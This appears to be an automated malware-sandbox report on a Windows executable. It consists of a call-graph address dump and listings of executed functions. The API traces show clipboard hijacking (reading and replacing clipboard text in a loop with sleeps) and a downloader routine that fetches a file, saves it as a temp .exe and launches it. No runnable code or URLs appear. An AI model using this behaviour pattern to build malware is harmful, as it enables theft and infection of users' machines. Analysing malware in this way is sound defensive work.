65364->65337 65366 4346e3 65383 42eab6 20 API calls _Atexit 65366->65383 65367 4346ee 65384 434728 LeaveCriticalSection __wsopen_s 65367->65384 65370->65359 65388 439921 65371->65388 65373 434767 65374 434780 SetFilePointerEx 65373->65374 65375 43476f 65373->65375 65377 434798 GetLastError 65374->65377 65379 434774 65374->65379 65401 42eac9 20 API calls _Atexit 65375->65401 65402 42ea93 20 API calls 2 library calls 65377->65402 65379->65367 65380->65350 65381->65364 65382->65366 65383->65367 65384->65364 65385->65354 65386->65358 65387->65364 65389 439943 65388->65389 65390 43992e 65388->65390 65395 439968 65389->65395 65405 42eab6 20 API calls _Atexit 65389->65405 65403 42eab6 20 API calls _Atexit 65390->65403 65392 439933 65404 42eac9 20 API calls _Atexit 65392->65404 65395->65373 65396 439973 65406 42eac9 20 API calls _Atexit 65396->65406 65398 43993b 65398->65373 65399 43997b 65407 42a59d 26 API calls _Deallocate 65399->65407 65401->65379 65402->65379 65403->65392 65404->65398 65405->65396 65406->65399 65407->65398 65408 4332de 65409 4332eb 65408->65409 65412 433303 65408->65412 65458 42eac9 20 API calls _Atexit 65409->65458 65411 4332f0 65459 42a59d 26 API calls _Deallocate 65411->65459 65414 43335e 65412->65414 65422 4332fb 65412->65422 65460 434ccd 21 API calls 2 library calls 65412->65460 65415 432908 __fread_nolock 26 API calls 65414->65415 65417 433376 65415->65417 65428 432e16 65417->65428 65419 43337d 65420 432908 __fread_nolock 26 API calls 65419->65420 65419->65422 65421 4333a9 65420->65421 65421->65422 65423 432908 __fread_nolock 26 API calls 65421->65423 65424 4333b7 65423->65424 65424->65422 65425 432908 __fread_nolock 26 API calls 65424->65425 65426 4333c7 65425->65426 65427 432908 __fread_nolock 26 API calls 65426->65427 65427->65422 65429 432e22 ___DestructExceptionObject 65428->65429 65430 432e42 65429->65430 65431 432e2a 65429->65431 65433 432f08 65430->65433 65438 432e7b 65430->65438 65527 42eab6 20 API calls _Atexit 65431->65527 65534 42eab6 20 API calls _Atexit 65433->65534 65434 432e2f 65528 42eac9 20 API calls _Atexit 65434->65528 65436 432f0d 65535 42eac9 20 API calls _Atexit 65436->65535 65440 432e8a 65438->65440 65441 432e9f 65438->65441 65529 42eab6 20 API calls _Atexit 65440->65529 65461 4396a4 EnterCriticalSection 65441->65461 65443 432e97 65536 42a59d 26 API calls _Deallocate 65443->65536 65445 432ea5 65447 432ec1 65445->65447 65448 432ed6 65445->65448 65446 432e8f 65530 42eac9 20 API calls _Atexit 65446->65530 65531 42eac9 20 API calls _Atexit 65447->65531 65462 432f29 65448->65462 65450 432e37 std::_Locinfo::_Locinfo_ctor 65450->65419 65454 432ec6 65532 42eab6 20 API calls _Atexit 65454->65532 65455 432ed1 65533 432f00 LeaveCriticalSection __wsopen_s 65455->65533 65458->65411 65459->65422 65460->65414 65461->65445 65463 432f53 65462->65463 65464 432f3b 65462->65464 65466 4332bd 65463->65466 65476 432f98 65463->65476 65546 42eab6 20 API calls _Atexit 65464->65546 65564 42eab6 20 API calls _Atexit 65466->65564 65467 432f40 65547 42eac9 20 API calls _Atexit 65467->65547 65470 4332c2 65565 42eac9 20 API calls _Atexit 65470->65565 65472 432fa3 65548 42eab6 20 API calls _Atexit 65472->65548 65474 432f48 65474->65455 65475 432fa8 65549 42eac9 20 API calls _Atexit 65475->65549 65476->65472 65476->65474 65479 432fd3 65476->65479 65477 432fb0 65566 42a59d 26 API calls _Deallocate 65477->65566 65481 432fec 65479->65481 65482 433012 65479->65482 65483 43302e 65479->65483 65481->65482 65487 432ff9 65481->65487 65550 42eab6 20 API calls _Atexit 65482->65550 65553 4336a7 21 API calls 3 library calls 65483->65553 65486 433017 65551 42eac9 20 API calls _Atexit 65486->65551 65537 43d365 65487->65537 65488 433045 65493 43346a _free 20 API calls 65488->65493 65491 433197 65494 43320d 65491->65494 65497 4331b0 GetConsoleMode 65491->65497 65492 43301e 65552 42a59d 26 API calls _Deallocate 65492->65552 65496 43304e 65493->65496 65499 433211 ReadFile 65494->65499 65498 43346a _free 20 API calls 65496->65498 65497->65494 65502 4331c1 65497->65502 65503 433055 65498->65503 65500 433285 GetLastError 65499->65500 65501 43322b 65499->65501 65504 433292 65500->65504 65505 4331e9 65500->65505 65501->65500 65506 433202 65501->65506 65502->65499 65507 4331c7 ReadConsoleW 65502->65507 65508 43307a 65503->65508 65509 43305f 65503->65509 65562 42eac9 20 API calls _Atexit 65504->65562 65524 433029 __fread_nolock 65505->65524 65559 42ea93 20 API calls 2 library calls 65505->65559 65519 433250 65506->65519 65520 433267 65506->65520 65506->65524 65507->65506 65512 4331e3 GetLastError 65507->65512 65556 4347ee 65508->65556 65554 42eac9 20 API calls _Atexit 65509->65554 65512->65505 65513 43346a _free 20 API calls 65513->65474 65515 433297 65563 42eab6 20 API calls _Atexit 65515->65563 65517 433064 65555 42eab6 20 API calls _Atexit 65517->65555 65560 432c45 31 API calls 3 library calls 65519->65560 65523 43327e 65520->65523 65520->65524 65561 432a85 29 API calls __fread_nolock 65523->65561 65524->65513 65526 433283 65526->65524 65527->65434 65528->65450 65529->65446 65530->65443 65531->65454 65532->65455 65533->65450 65534->65436 65535->65443 65536->65450 65538 43d372 65537->65538 65539 43d37f 65537->65539 65567 42eac9 20 API calls _Atexit 65538->65567 65542 43d38b 65539->65542 65568 42eac9 20 API calls _Atexit 65539->65568 65541 43d377 65541->65491 65542->65491 65544 43d3ac 65569 42a59d 26 API calls _Deallocate 65544->65569 65546->65467 65547->65474 65548->65475 65549->65477 65550->65486 65551->65492 65552->65524 65553->65488 65554->65517 65555->65524 65557 434755 __fread_nolock 28 API calls 65556->65557 65558 434804 65557->65558 65558->65487 65559->65524 65560->65524 65561->65526 65562->65515 65563->65524 65564->65470 65565->65477 65566->65474 65567->65541 65568->65544 65569->65541 65570 a3983e 65571 a3984d 65570->65571 65574 a39fde 65571->65574 65579 a39ff9 65574->65579 65575 a3a002 CreateToolhelp32Snapshot 65576 a3a01e Module32First 65575->65576 65575->65579 65577 a39856 65576->65577 65578 a3a02d 65576->65578 65581 a39c9d 65578->65581 65579->65575 65579->65576 65582 a39cc8 65581->65582 65583 a39d11 65582->65583 65584 a39cd9 VirtualAlloc 65582->65584 65583->65583 65584->65583 65585 402bad RegCreateKeyExW 65586 402bdb RegSetValueExW 65585->65586 65587 402bef 65585->65587 65586->65587 65588 402bf4 RegCloseKey 65587->65588 65589 402bfd 65587->65589 65588->65589 65590 404b8e 65591 404b9a Concurrency::details::ResourceManager::Version 65590->65591 65596 40fb0c 65591->65596 65595 404bba Concurrency::details::ResourceManager::Version std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65598 40fb11 65596->65598 65599 404ba3 65598->65599 65601 40fb2d Concurrency::details::SchedulerBase::Initialize 65598->65601 65620 42ad7e 65598->65620 65627 42f450 7 API calls 2 library calls 65598->65627 65604 4051d0 65599->65604 65628 42860d RaiseException 65601->65628 65603 4103cc 65605 4051dc Concurrency::details::ResourceManager::Version __Cnd_init 65604->65605 65607 4051f4 __Mtx_init 65605->65607 65639 40ce32 28 API calls std::_Throw_Cpp_error 65605->65639 65608 40521b 65607->65608 65640 40ce32 28 API calls std::_Throw_Cpp_error 65607->65640 65631 4010ea 65608->65631 65614 40526a 65616 40527f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65614->65616 65642 401128 30 API calls std::_Cnd_waitX 65614->65642 65643 401109 65616->65643 65619 4052a4 Concurrency::details::ResourceManager::Version 65619->65595 65625 4336a7 std::_Locinfo::_Locinfo_ctor 65620->65625 65621 4336e5 65630 42eac9 20 API calls _Atexit 65621->65630 65622 4336d0 RtlAllocateHeap 65624 4336e3 65622->65624 65622->65625 65624->65598 65625->65621 65625->65622 65629 42f450 7 API calls 2 library calls 65625->65629 65627->65598 65628->65603 65629->65625 65630->65624 65647 40d313 65631->65647 65634 401103 65636 40cef3 65634->65636 65671 42e114 65636->65671 65639->65607 65640->65608 65641 40ce32 28 API calls std::_Throw_Cpp_error 65641->65614 65642->65614 65644 401115 __Mtx_unlock 65643->65644 65645 401122 65644->65645 65996 40ce32 28 API calls std::_Throw_Cpp_error 65644->65996 65645->65619 65651 40d06d 65647->65651 65650 40ce32 28 API calls std::_Throw_Cpp_error 65650->65634 65652 40d0c3 65651->65652 65653 40d095 GetCurrentThreadId 65651->65653 65654 40d0c7 GetCurrentThreadId 65652->65654 65655 40d0ed 65652->65655 65656 40d0a0 GetCurrentThreadId 65653->65656 65661 40d0bb 65653->65661 65657 40d0d6 65654->65657 65658 40d186 GetCurrentThreadId 65655->65658 65662 40d10d 65655->65662 65656->65661 65659 40d1dd GetCurrentThreadId 65657->65659 65657->65661 65658->65657 65659->65661 65660 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65663 4010f6 65660->65663 65661->65660 65669 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65662->65669 65663->65634 65663->65650 65666 40d145 GetCurrentThreadId 65666->65657 65667 40d118 __Xtime_diff_to_millis2 65666->65667 65667->65657 65667->65661 65667->65666 65670 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65667->65670 65669->65667 65670->65667 65672 42e121 65671->65672 65673 42e135 65671->65673 65694 42eac9 20 API calls _Atexit 65672->65694 65685 42e0cb 65673->65685 65676 42e126 65695 42a59d 26 API calls _Deallocate 65676->65695 65679 42e14a CreateThread 65681 42e169 GetLastError 65679->65681 65684 42e175 65679->65684 65716 42dfc0 65679->65716 65680 405257 65680->65614 65680->65641 65696 42ea93 20 API calls 2 library calls 65681->65696 65697 42e03d 65684->65697 65705 434d2a 65685->65705 65688 43346a _free 20 API calls 65689 42e0e4 65688->65689 65690 42e103 65689->65690 65691 42e0eb GetModuleHandleExW 65689->65691 65692 42e03d __Thrd_start 22 API calls 65690->65692 65691->65690 65693 42e10d 65692->65693 65693->65679 65693->65684 65694->65676 65695->65680 65696->65684 65698 42e04a 65697->65698 65699 42e06e 65697->65699 65700 42e050 CloseHandle 65698->65700 65701 42e059 65698->65701 65699->65680 65700->65701 65702 42e068 65701->65702 65703 42e05f FreeLibrary 65701->65703 65704 43346a _free 20 API calls 65702->65704 65703->65702 65704->65699 65706 434d37 65705->65706 65707 434d77 65706->65707 65708 434d62 HeapAlloc 65706->65708 65711 434d4b std::_Locinfo::_Locinfo_ctor 65706->65711 65715 42eac9 20 API calls _Atexit 65707->65715 65709 434d75 65708->65709 65708->65711 65712 42e0db 65709->65712 65711->65707 65711->65708 65714 42f450 7 API calls 2 library calls 65711->65714 65712->65688 65714->65711 65715->65712 65717 42dfcc _Atexit 65716->65717 65718 42dfd3 GetLastError ExitThread 65717->65718 65719 42dfe0 65717->65719 65732 431eda GetLastError 65719->65732 65721 42dfe5 65752 435571 65721->65752 65724 42dffb 65759 401169 65724->65759 65733 431ef0 65732->65733 65734 431ef6 65732->65734 65767 435111 11 API calls 2 library calls 65733->65767 65736 434d2a __Getcvt 20 API calls 65734->65736 65738 431f45 SetLastError 65734->65738 65737 431f08 65736->65737 65739 431f10 65737->65739 65768 435167 11 API calls 2 library calls 65737->65768 65738->65721 65741 43346a _free 20 API calls 65739->65741 65743 431f16 65741->65743 65742 431f25 65742->65739 65744 431f2c 65742->65744 65746 431f51 SetLastError 65743->65746 65769 431d4c 20 API calls __Getcvt 65744->65769 65770 42df7d 167 API calls 2 library calls 65746->65770 65747 431f37 65749 43346a _free 20 API calls 65747->65749 65751 431f3e 65749->65751 65750 431f5d 65751->65738 65751->65746 65753 435596 65752->65753 65754 43558c 65752->65754 65771 434e93 5 API calls 2 library calls 65753->65771 65756 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65754->65756 65757 42dff0 65756->65757 65757->65724 65766 4354a4 10 API calls 2 library calls 65757->65766 65758 4355ad 65758->65754 65772 405800 65759->65772 65785 40155a Sleep 65759->65785 65760 401173 65763 42e199 65760->65763 65964 42e074 65763->65964 65765 42e1a6 65766->65724 65767->65734 65768->65742 65769->65747 65770->65750 65771->65758 65773 40580c Concurrency::details::ResourceManager::Version 65772->65773 65774 4010ea std::_Cnd_initX 35 API calls 65773->65774 65775 405821 __Cnd_signal 65774->65775 65776 405839 65775->65776 65831 40ce32 28 API calls std::_Throw_Cpp_error 65775->65831 65777 401109 std::_Cnd_initX 28 API calls 65776->65777 65779 405842 65777->65779 65787 4016df 65779->65787 65808 4029f4 InternetOpenW 65779->65808 65782 405849 Concurrency::details::ResourceManager::Version std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65782->65760 65786 4016d5 65785->65786 65832 40fde6 65787->65832 65789 4016eb Sleep 65833 40cc10 65789->65833 65792 40cc10 28 API calls 65793 401711 65792->65793 65794 40171b OpenClipboard 65793->65794 65795 401943 Sleep 65794->65795 65796 40172b GetClipboardData 65794->65796 65795->65794 65797 40173b GlobalLock 65796->65797 65798 40193d CloseClipboard 65796->65798 65797->65798 65800 401748 _strlen 65797->65800 65798->65795 65799 40cbc7 28 API calls std::system_error::system_error 65799->65800 65800->65798 65800->65799 65801 40cc10 28 API calls 65800->65801 65803 4018d2 EmptyClipboard GlobalAlloc 65800->65803 65837 402e66 167 API calls 2 library calls 65800->65837 65839 40caa6 26 API calls _Deallocate 65800->65839 65801->65800 65803->65800 65804 4018eb GlobalLock 65803->65804 65838 426990 65804->65838 65807 401905 GlobalUnlock SetClipboardData GlobalFree 65807->65800 65809 402a27 InternetOpenUrlW 65808->65809 65810 402b9c 65808->65810 65809->65810 65811 402a3d GetTempPathW GetTempFileNameW 65809->65811 65813 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65810->65813 65845 42a88e 65811->65845 65815 402bab 65813->65815 65824 40e76b 65815->65824 65816 402b8b InternetCloseHandle InternetCloseHandle 65816->65810 65817 402aa8 Concurrency::details::ResourceManager::InitializeRMBuffers 65818 402ac0 InternetReadFile WriteFile 65817->65818 65819 402b00 CloseHandle 65817->65819 65818->65817 65847 402960 65819->65847 65822 402b2b ShellExecuteExW 65822->65816 65823 402b72 WaitForSingleObject CloseHandle 65822->65823 65823->65816 65955 40deea 65824->65955 65829 40e810 65829->65782 65830 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65962 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65830->65962 65831->65776 65832->65789 65834 40cc2c _strlen 65833->65834 65840 40cbc7 65834->65840 65836 401704 65836->65792 65837->65800 65838->65807 65839->65800 65841 40cbfa 65840->65841 65842 40cbd6 BuildCatchObjectHelperInternal 65840->65842 65841->65842 65844 40cb5c 28 API calls 4 library calls 65841->65844 65842->65836 65844->65842 65846 402a76 CreateFileW 65845->65846 65846->65816 65846->65817 65848 40298b _wcslen Concurrency::details::ResourceManager::InitializeRMBuffers 65847->65848 65857 42b454 65848->65857 65852 4029b8 65879 404333 65852->65879 65855 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65856 4029f2 65855->65856 65856->65816 65856->65822 65883 42b106 65857->65883 65860 402823 65861 402832 Concurrency::details::ResourceManager::Version 65860->65861 65909 4032dd 65861->65909 65863 402846 65925 403b8b 65863->65925 65865 40285a 65866 402888 65865->65866 65867 40286c 65865->65867 65931 403112 65866->65931 65952 40329a 167 API calls 65867->65952 65870 402895 65934 403c20 65870->65934 65872 4028a7 65944 403cc2 65872->65944 65874 40287f std::ios_base::_Ios_base_dtor Concurrency::details::ResourceManager::Version 65874->65852 65875 4028c4 65876 404333 26 API calls 65875->65876 65877 4028e3 65876->65877 65953 40329a 167 API calls 65877->65953 65880 4029e4 65879->65880 65881 40433b 65879->65881 65880->65855 65954 40cc96 26 API calls 2 library calls 65881->65954 65884 42b133 65883->65884 65885 42b142 65884->65885 65886 42b15a 65884->65886 65887 42b137 65884->65887 65888 42eac9 _free 20 API calls 65885->65888 65889 42a747 __fassign 162 API calls 65886->65889 65890 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65887->65890 65891 42b147 65888->65891 65892 42b165 65889->65892 65893 4029a4 65890->65893 65894 42a59d pre_c_initialization 26 API calls 65891->65894 65895 42b170 65892->65895 65896 42b307 65892->65896 65893->65860 65894->65887 65898 42b218 WideCharToMultiByte 65895->65898 65901 42b17b 65895->65901 65906 42b1b5 WideCharToMultiByte 65895->65906 65897 42b334 WideCharToMultiByte 65896->65897 65900 42b312 65896->65900 65897->65900 65898->65901 65902 42b243 65898->65902 65900->65887 65903 42eac9 _free 20 API calls 65900->65903 65901->65887 65905 42eac9 _free 20 API calls 65901->65905 65902->65901 65904 42b24c GetLastError 65902->65904 65903->65887 65904->65901 65908 42b25b 65904->65908 65905->65887 65906->65901 65907 42b274 WideCharToMultiByte 65907->65900 65907->65908 65908->65887 65908->65900 65908->65907 65910 4032e9 Concurrency::details::ResourceManager::Version 65909->65910 65911 40467c 167 API calls 65910->65911 65912 403315 65911->65912 65913 40484d 167 API calls 65912->65913 65914 40333e 65913->65914 65915 40458c 26 API calls 65914->65915 65916 40334d 65915->65916 65917 403392 std::ios_base::_Ios_base_dtor 65916->65917 65918 40dde3 167 API calls 65916->65918 65919 4033ce Concurrency::details::ResourceManager::Version 65917->65919 65921 40c618 167 API calls 65917->65921 65920 403362 65918->65920 65919->65863 65920->65917 65922 40458c 26 API calls 65920->65922 65921->65919 65923 403373 65922->65923 65924 404c14 167 API calls 65923->65924 65924->65917 65926 403b97 Concurrency::details::ResourceManager::Version 65925->65926 65927 4042af 167 API calls 65926->65927 65928 403ba3 65927->65928 65929 403bc7 Concurrency::details::ResourceManager::Version 65928->65929 65930 4034fb 167 API calls 65928->65930 65929->65865 65930->65929 65932 404356 28 API calls 65931->65932 65933 40312c Concurrency::details::ResourceManager::InitializeRMBuffers 65932->65933 65933->65870 65935 403c2c Concurrency::details::ResourceManager::Version 65934->65935 65936 40c618 167 API calls 65935->65936 65937 403c4f 65936->65937 65938 4042af 167 API calls 65937->65938 65939 403c59 65938->65939 65941 403c9c Concurrency::details::ResourceManager::Version 65939->65941 65943 4034fb 167 API calls 65939->65943 65940 403c7a 65940->65941 65942 4046ca 167 API calls 65940->65942 65941->65872 65942->65941 65943->65940 65945 403cce __EH_prolog3_catch 65944->65945 65946 4042af 167 API calls 65945->65946 65949 403ce7 65946->65949 65947 403d17 65948 4046ca 167 API calls 65947->65948 65950 403d70 Concurrency::details::ResourceManager::Version 65948->65950 65949->65947 65951 40369f 40 API calls 65949->65951 65950->65875 65951->65947 65952->65874 65953->65874 65954->65880 65963 40f22a EnterCriticalSection 65955->65963 65957 40def4 65958 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65957->65958 65959 40ced2 65958->65959 65960 40cec7 CloseHandle 65958->65960 65961 40ced6 GetCurrentThreadId 65959->65961 65960->65961 65961->65830 65962->65829 65963->65957 65973 431f5e GetLastError 65964->65973 65966 42e083 ExitThread 65969 42e0a1 65970 42e0ad CloseHandle 65969->65970 65971 42e0b4 65969->65971 65970->65971 65971->65966 65972 42e0c0 FreeLibraryAndExitThread 65971->65972 65974 431f7d 65973->65974 65975 431f77 65973->65975 65976 434d2a __Getcvt 17 API calls 65974->65976 65979 431fd4 SetLastError 65974->65979 65993 435111 11 API calls 2 library calls 65975->65993 65978 431f8f 65976->65978 65986 431f97 65978->65986 65994 435167 11 API calls 2 library calls 65978->65994 65980 42e07f 65979->65980 65980->65966 65980->65969 65992 4354f6 10 API calls 2 library calls 65980->65992 65982 43346a _free 17 API calls 65984 431f9d 65982->65984 65983 431fac 65985 431fb3 65983->65985 65983->65986 65987 431fcb SetLastError 65984->65987 65995 431d4c 20 API calls __Getcvt 65985->65995 65986->65982 65987->65980 65989 431fbe 65990 43346a _free 17 API calls 65989->65990 65991 431fc4 65990->65991 65991->65979 65991->65987 65992->65969 65993->65974 65994->65983 65995->65989 65996->65645 65997 40239e 65998 402561 PostQuitMessage 65997->65998 65999 4023b2 65997->65999 66000 40255f 65998->66000 66001 4023b9 DefWindowProcW 65999->66001 66002 4023d0 65999->66002 66001->66000 66002->66000 66003 4029f4 167 API calls 66002->66003 66003->66000

                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                      Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                                      • String ID: i
                                                                                                                                                                                                                                                                                      • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                                                                      • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                                      • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D
                                                                                                                                                                                                                                                                                      Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                                      • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                                                                      • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                                                                      • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                                      • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                                                                      Function 00A39FDE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A3A006
                                                                                                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00A3A026
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A39000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_a39000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                      • Instruction ID: dccea5baf3c49d14a23887b3ca803f927808d4aa0a3ee91516fbd6d49097cd32
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5F096362007206FD7243BF5988DBAFB6E8AF59725F100529F683D10C0DBB0EC458A61
                                                                                                                                                                                                                                                                                      Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
